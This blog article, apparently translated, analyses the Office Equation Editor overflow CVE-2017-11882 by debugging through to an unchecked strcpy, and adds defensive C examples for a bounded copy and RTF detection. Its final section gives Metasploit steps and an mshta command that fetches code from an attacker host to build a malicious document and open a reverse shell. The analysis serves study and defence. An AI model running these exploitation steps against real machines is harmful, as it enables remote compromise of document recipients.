
How to do CVE-2017-11882 analysis

2025-04-01 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report

Many people new to this area are unsure how to carry out an analysis of CVE-2017-11882. This article therefore summarizes the cause of the problem and its solution, so that readers can work through it themselves.

Preface

When it comes to Office phishing, CVE-2017-11882 always comes up. I first ran into this vulnerability last year while analyzing samples from the APT group Manglinghua, but never studied it in depth. Now I have some time to analyze and learn from it, because this vulnerability is a sharp weapon in the attacks of many well-known APT groups such as Manglinghua, White Elephant, Maha Grass, Rattlesnake and others. Studying it does not require bypassing protection mechanisms such as DEP and ASLR, and exploiting it is not complicated.

Vulnerability overview

CVE-2017-11882 is a remote code execution vulnerability published by Microsoft. It lies in the Equation Editor module EQNEDT32.EXE, which is installed by default with Office and embeds formulas into Office documents using OLE (Object Linking and Embedding). The formula editor EQNEDT32.EXE (path C:\Program Files\Common Files\microsoft shared\EQUATION) reads OLE data containing MathType formulas and, when copying the formula's font name, does not check the name length. An attacker can therefore use deliberately constructed data to overflow the stack buffer, overwrite the function's return address on the stack, hijack program execution and run their own malicious code. In addition, when a mathematical formula is inserted or edited, EQNEDT32.EXE is not created as a child of the Office process but runs as a separate process, so the protection mechanisms of the Office process cannot protect EQNEDT32.EXE from exploitation. In terms of impact, it affects every version of Office from 2003 to 2016.

Vulnerability analysis environment and tools

Win7 x64

Office 2003

IDA

OllyDbg

MSF

Vulnerability analysis: installing Office

I use Office 2003 (a full installation is required). Once it is installed, check whether everything is present as the figure below shows: Menu > Insert > Object, and look for Microsoft Equation 3.0. If it is not listed, the installation is not the full version.

Office 2003 full installer: https://pan.baidu.com/s/1O7BsRE4YQQLvWOWYikGz6Q extraction code: g0dh

Locating the vulnerable file

Following the path above we can find the vulnerable program; the exeinfo output shows it was written in VC++.

Verifying the vulnerability with the POC

Once the environment is set up, we can use the POC to quickly verify the vulnerability. Opening exploit.rtf pops up the calculator without any prompt, which confirms that the vulnerability is present.

Calculator pop-up POC: https://github.com/Ridter/CVE-2017-11882

Detailed analysis

Because the calculator pops up when we open the POC, a new process has been created, and we can guess that the API used to create it is WinExec or CreateProcess. We can therefore attach OllyDbg (OD) to EQNEDT32.EXE, set breakpoints on those APIs and debug dynamically.

First open EQNEDT32.EXE, then attach OD to the process.

Next set the API breakpoint with the command BP WinExec and open the POC file. The program breaks, and the contents of the stack show that the breakpoint is the right one.

In the stack in the figure above, the return address of WinExec is 00430C18 and the parameter is 0018F354; the parameter's contents are a cmd command that opens the calculator.

At this point 00430C12 is a user-mode address. By rights ebp should lead to the return address of the current function, but it shows 41414141, so ebp has clearly been clobbered. Because the stack has already been destroyed by the constructed malicious shellcode at this point, we walk up the stack to see where ebp was overwritten.

We find the most recent return address, 00411837, follow it, scroll up, set a breakpoint at the start of that function and rerun so that the program breaks inside it.

The program breaks

Stepping with F8, we find this instruction at 00411658: rep movsd dword ptr es:[edi], dword ptr [esi]. After it executes, ebp is overwritten with 41414141. The instruction copies dwords from the location esi points to into the location edi points to.

Contents of esi and edi before the instruction executes (figures omitted):

ESI:

EDI:

After rep movsd dword ptr es:[edi], dword ptr [esi] executes, the block at edi has been written. The value of ebp has changed from 0018F214 to 41414141, and the return address following ebp has changed from 004115d8 to 00430c12.

The code at 00430C12

After WinExec runs, it calls CreateProcess internally; at that breakpoint we can see the function's parameters, namely the cmd call that pops up the calculator.

Dynamic debugging has told us the vulnerable location is 00411658; next we use static analysis. Open EQNEDT32.EXE in IDA and jump to address 00411658.

Press F5 to view the pseudocode below. Anyone who has learned C will see it at a glance: the unsafe strcpy is used without checking or limiting the length of its argument, producing a stack overflow.
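The root cause the pseudocode shows (an unbounded strcpy of the font name into a fixed stack buffer, as described in the vulnerability overview) and the check that removes it, as an added C example. This is not code from the page or from EQNEDT32.EXE: the three-byte record header, the 36-byte buffer size and the function names are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed size of the fixed stack buffer that receives the font name.
 * The page only says the name is copied with no length check; the exact
 * figure is an assumption made for this demonstration. */
#define FONT_NAME_BUF 36

/* Simplified, hypothetical font record: three header bytes (tag,
 * typeface, style) followed by a NUL-terminated font name. This is not
 * the real MathType record layout. */
typedef struct {
    const unsigned char *data;
    size_t len;
} font_record_t;

/* The pattern the pseudocode shows: strcpy into a fixed buffer with no
 * bound. A name longer than the buffer runs past it and overwrites the
 * saved ebp and return address, which is what the debugging session
 * above observed (ebp = 41414141). Only called here with a short name. */
static void copy_font_name_unsafe(char *dst, const char *src)
{
    strcpy(dst, src);  /* writes strlen(src) + 1 bytes, whatever that is */
}

/* Hardened form: locate the terminator inside the record, check that the
 * name plus terminator fits, and copy only then. Returns 0 on success,
 * -1 for a truncated record, a missing terminator, or an oversized name. */
int copy_font_name_checked(char *dst, const font_record_t *rec)
{
    if (rec->len < 3) return -1;
    const unsigned char *name = rec->data + 3;
    size_t avail = rec->len - 3;
    const void *nul = memchr(name, '\0', avail);   /* never read past the record */
    if (nul == NULL) return -1;
    size_t name_len = (size_t)((const unsigned char *)nul - name);
    if (name_len >= FONT_NAME_BUF) return -1;      /* leave room for the NUL */
    memcpy(dst, name, name_len + 1);
    return 0;
}

/* Build a constructed record whose name is n copies of 'A', mirroring the
 * 0x41 filler seen in the POC. Returns the record length, 0 if it will not fit. */
static size_t make_record(unsigned char *out, size_t cap, size_t n)
{
    if (n + 4 > cap) return 0;
    out[0] = 0x08; out[1] = 0x00; out[2] = 0x00;   /* constructed header bytes */
    memset(out + 3, 'A', n);
    out[3 + n] = '\0';
    return n + 4;
}

/* 1 if the checked copy accepts a name of n bytes, 0 if it rejects it. */
int accepts_name_of_length(size_t n)
{
    unsigned char raw[512];
    char dst[FONT_NAME_BUF];
    font_record_t rec = { raw, make_record(raw, sizeof raw, n) };
    return copy_font_name_checked(dst, &rec) == 0;
}

/* 0 when a record that lacks the terminator is rejected. */
int accepts_unterminated(void)
{
    unsigned char raw[8] = { 0x08, 0x00, 0x00, 'A', 'A', 'A', 'A', 'A' };
    char dst[FONT_NAME_BUF];
    font_record_t rec = { raw, sizeof raw };
    return copy_font_name_checked(dst, &rec) == 0;
}

int main(void)
{
    char dst[FONT_NAME_BUF];
    copy_font_name_unsafe(dst, "Times New Roman");  /* short name: fits */
    printf("unsafe copy of a short name: %s\n", dst);
    printf("35-byte name accepted: %d\n", accepts_name_of_length(35));
    printf("36-byte name accepted: %d\n", accepts_name_of_length(36));
    printf("200-byte name accepted: %d\n", accepts_name_of_length(200));
    return 0;
}
```

The checked version refuses a 36-byte name even though the buffer is 36 bytes, because the terminator has to fit too; that off-by-one is the usual place a "fixed" copy still overflows. It also searches for the terminator only within the record, so a record that omits it cannot make the copy read beyond the OLE data.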

POC content details

At this point, a rough analysis of the vulnerability has been completed.

Exploiting the vulnerability with MSF

Python script download: https://github.com/Ridter/CVE-2017-11882

MSF module download: https://github.com/0x09AL/CVE-2017-11882-metasploit

Copy the cve_2017_11882.rb file downloaded above to the /usr/share/metasploit-framework/modules/exploits/windows/smb/ directory.

Put the downloaded cve_2017_11882.rtf into /usr/share/metasploit-framework/data/exploits/.

Reload the modules.

Use search cve_2017_11882 to find the module, then use exploit/windows/smb/cve_2017_11882, set the payload to a reverse TCP payload, set the remaining parameters (lhost is the IP of the Kali machine), and use set URIPATH test to set the URI path (note the path test set here, which must also be given when generating the doc with the Python script).

Run it: exploit -j

Open another terminal, copy Command109b_CVE-2017-11882.py to the Kali Linux desktop, cd to the desktop and run python Command109b_CVE-2017-11882.py -c "mshta http://192.168.62.129:8080/test" -o test2.doc to generate the malicious doc file.

Copy the file to the target machine and open it.

Back on the Kali Linux attacking machine, the target is now online.

From here we can continue with the usual follow-up.
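From the defender's side, the documents this procedure produces reach EQNEDT32.EXE through an embedded Equation Editor OLE object, which in an RTF file sits hex-encoded under \objdata. As an added example, not code from the page or from either repository linked above, this C scanner decodes each \objdata run and checks the OLE 1.0 object header for the class name Equation.3. The sample RTF is constructed, and the 4096-byte per-object decode limit is an assumption.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdint.h>

/* Per-object decode limit; an assumption for the demo, not an RTF rule. */
#define OBJ_MAX 4096

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode the hex run that follows an \objdata control word into out.
 * Whitespace is skipped because RTF writers wrap the hex freely; the run
 * ends at the closing brace or at the first non-hex character.
 * Returns the number of bytes written (truncated at cap). */
size_t decode_objdata(const char *p, unsigned char *out, size_t cap)
{
    size_t n = 0;
    int hi = -1;
    for (; *p != '\0' && *p != '}'; p++) {
        if (isspace((unsigned char)*p)) continue;
        int v = hexval((unsigned char)*p);
        if (v < 0) break;
        if (hi < 0) { hi = v; continue; }
        if (n < cap) out[n++] = (unsigned char)((hi << 4) | v);
        hi = -1;
    }
    return n;
}

/* OLE 1.0 object header as found in \objdata: 4-byte version, 4-byte
 * format id, 4-byte class-name length (including the NUL), then the
 * class name. Returns 1 when that name is exactly "Equation.3". */
int ole1_class_is_equation(const unsigned char *obj, size_t len)
{
    static const char cls[] = "Equation.3";          /* 11 bytes with NUL */
    if (len < 12) return 0;
    uint32_t name_len = (uint32_t)obj[8] | (uint32_t)obj[9] << 8 |
                        (uint32_t)obj[10] << 16 | (uint32_t)obj[11] << 24;
    if (name_len != sizeof cls) return 0;
    if (len < 12 + name_len) return 0;
    return memcmp(obj + 12, cls, sizeof cls) == 0;
}

/* Count embedded objects in an RTF text whose OLE1 class is Equation.3. */
int count_equation_objects(const char *rtf)
{
    int hits = 0;
    const char *p = rtf;
    while ((p = strstr(p, "\\objdata")) != NULL) {
        p += strlen("\\objdata");
        unsigned char obj[OBJ_MAX];
        size_t n = decode_objdata(p, obj, sizeof obj);
        if (ole1_class_is_equation(obj, n)) hits++;
    }
    return hits;
}

/* Decoded size of the first \objdata run, 0 if the text has none. */
size_t first_object_size(const char *rtf)
{
    const char *p = strstr(rtf, "\\objdata");
    if (p == NULL) return 0;
    unsigned char obj[OBJ_MAX];
    return decode_objdata(p + strlen("\\objdata"), obj, sizeof obj);
}

/* Constructed sample: two embedded objects. The first carries an OLE1
 * header with class "Equation.3" and a few filler bytes in place of the
 * real object body; the second is an ordinary "Package" object. */
const char SAMPLE_RTF[] =
    "{\\rtf1\\ansi"
    "{\\object\\objemb{\\*\\objclass Equation.3}"
    "{\\*\\objdata 01050000 02000000 0b000000 4571756174696f6e2e3300\r\n"
    "00000000 00000000 0c000000 d0cf11e0}}"
    "{\\object\\objemb{\\*\\objdata 01050000 02000000 08000000 5061636b61676500}}"
    "}";

int main(void)
{
    printf("Equation.3 objects in sample: %d\n", count_equation_objects(SAMPLE_RTF));
    return 0;
}
```

The class name is read from the decoded object stream rather than from \objclass, which a writer can simply omit. A hit is a triage signal, not proof of exploitation: a benign document can legitimately embed an equation, so the next step is to inspect the decoded object (for example for the long font-name field the analysis above describes) or detonate it in a sandbox.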

After reading the above, have you mastered how to carry out CVE-2017-11882 analysis? If you want to learn more or find out more about this topic, you are welcome to follow the industry information channel. Thank you for reading!
